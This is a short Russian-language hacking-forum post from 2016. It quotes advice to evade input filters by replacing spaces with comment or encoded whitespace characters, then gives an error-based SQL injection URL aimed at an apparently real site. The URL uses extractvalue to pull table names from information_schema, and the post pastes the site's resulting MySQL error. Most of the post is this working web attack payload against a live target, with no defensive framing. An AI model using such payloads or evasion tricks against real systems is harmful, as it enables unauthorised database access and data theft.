29.08.2016, 19:07
|
|
Новичок
Регистрация: 27.08.2016
Сообщений: 16
С нами:
5111606
Репутация:
0
|
|
Сообщение от Konqi
↑
вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
Вот пример:
Код:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
|
|
|